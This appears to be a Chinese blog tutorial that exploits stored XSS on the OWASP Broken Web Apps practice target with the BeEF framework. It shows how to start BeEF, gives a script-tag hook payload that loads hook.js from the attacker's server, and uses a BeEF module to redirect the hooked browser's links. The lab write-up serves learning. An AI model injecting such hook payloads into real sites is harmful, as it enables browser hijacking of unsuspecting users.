一个简单的Web劫持(XSS漏洞)

一个简单的Web劫持

本篇文章仅供参考学习,切勿用作非法用途

今天给大家带来我的另一个学习过程的分享,就是XSS漏洞的利用,还是原来的味道,先介绍一下这次XSS渗透的工具。

1:beef(用来植入勾子,且对网站进行控制)
在这里插入图片描述
2:OWASP_Broken_Web_Apps(靶子)
在这里插入图片描述
先给大家讲一下大概的思路吧,就是先启动Beef,将勾子ip(其实也就是Beef的ip)写成语句,然后将语句写入目标网站有XSS漏洞的地方,比如留言板。然后利用Beef对目标站点进行控制。

文章目录

    • 一个简单的Web劫持
      • 本篇文章仅供参考学习,切勿用作非法用途
    • 一.启动Beef服务
    • 二.OWASP靶场
    • 三.利用Beef劫持浏览器

一.启动Beef服务

首先在这里就不具体讲解Beef如何下载和设置了,大家可以自己去百度一下,这种东西毕竟还是需要自己来实践的嘛,算了还是给你们个链接吧,谁让我爱你们呢。

点我教你Beef的安装与简单使用
这里我用的是kali虚拟机,所以还是给大家贴一下命令图,首先单击虚拟机左侧任务栏的Beef按钮,如果没有这个图标的同学,可以尝试用命令开启一下 beef-xss,虽然Beef已经被做成了服务,但是还是不建议这么启动,还是建议大家从systemctl 命令来启动或关闭beef服务器

systemctl start beef-xss.service    #开启beef

systemctl stop beef-xss.service     #关闭beef

systemctl restart beef-xss.service  #重启beef

一个简单的Web劫持(XSS漏洞)_第1张图片
打开后这时会弹出一个网页,这个网页就是Beef,不要怀疑。结果一开我懵逼了。一个简单的Web劫持(XSS漏洞)_第2张图片
为什么没网,连接不上,捣鼓了一会我才想起来,我把默认的Beef 的IP 给改掉了,改成了虚拟机的ip,所以换一下IP就可以了。
一个简单的Web劫持(XSS漏洞)_第3张图片
果然进去了,这里提醒一下第一次用这个软件的小伙伴,这个平台默认的账号和密码 beef/beef。直接登上就好了。
一个简单的Web劫持(XSS漏洞)_第4张图片
这应该是初登上时候看到的页面,接下来我们去看一下运行Beef的控制台信息。细心的小伙伴肯定发现了,其实它已经帮我们写好了勾子文件,可以直接拿来用了,当然如果你把Beef的配置文件改了的话,就需要修改一下这个语句了,其实简单说就是把你的http://后面的IP改的和你登录Beef时,URL中一样的IP就好。
在这里插入图片描述
因为我改过配置文件,所以我的勾子语句是这样的:

<script src="http://192.168.187.131:3000/hook.js"></script>

大家如果没有修改过配置文件的话,勾子代码如下:

<script src="http://127.0.0.1:3000/hook.js"></script>

到这里Beef先到这里,接下来开始调整我们的靶场。

二.OWASP靶场

首先打开我们的靶场,然后找到里面的XSS漏洞的框,因为这个靶场里面标明了,所以直接点开就好了,然后把刚刚的代码写入,如图所示:
一个简单的Web劫持(XSS漏洞)_第5张图片
然后将代码提交上去,好了到这里靶场里面需要干的事情都结束了,然后返回Beef查看是否成功。

三.利用Beef劫持浏览器

返回Beef后我们发现在Beef的左侧出来一个IP。这就证明此时浏览器已经上钩了,我们就可以对它进行控制了。
在这里插入图片描述
然后单击这个IP地址,此时右边出来一些东西。然后按照下图进行。
一个简单的Web劫持(XSS漏洞)_第6张图片
然后打开Browser目录,再单击Hooked Domain目录,找见Reaplace HREFs
一个简单的Web劫持(XSS漏洞)_第7张图片
然后再右侧的框中输入想让页面跳转的网址,这里以 百度 为例,所以在右边输入了 www.baidu.com
一个简单的Web劫持(XSS漏洞)_第8张图片
然后点击Execute,然后返回我们的靶场网站,随便点击一个页面中的网站,就会发现没有跳转到目标站点,而是挑战到了百度的主页。
一个简单的Web劫持(XSS漏洞)_第9张图片
到此这次XSS漏洞的利用到此就完成了,至于Beef中的其它功能还需要大家自己去查阅学习。这里只对软件进行基础的讲解。顺便给大家说一下Beef目录中的不同颜色的圆点的意思:

绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常

橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常

灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行

红色:命令模块不适用于此目标

~
~
好了!这次XSS漏洞的利用到此就结束了,对其实XSS漏洞原名叫CSS(Cross Site Scripting),但是你知道为什么改名吗?哈哈哈哈,快去百度一下吧!
~
~
~

属实创作不易,希望看到此文的小伙伴可以给博主点个赞!! 谢谢大家!!*

一个简单的Web劫持(XSS漏洞)_第10张图片
~

再次强调本文仅供用来交流学习,切勿吴用,造成一切后果与本人无关

你可能感兴趣的:(网安)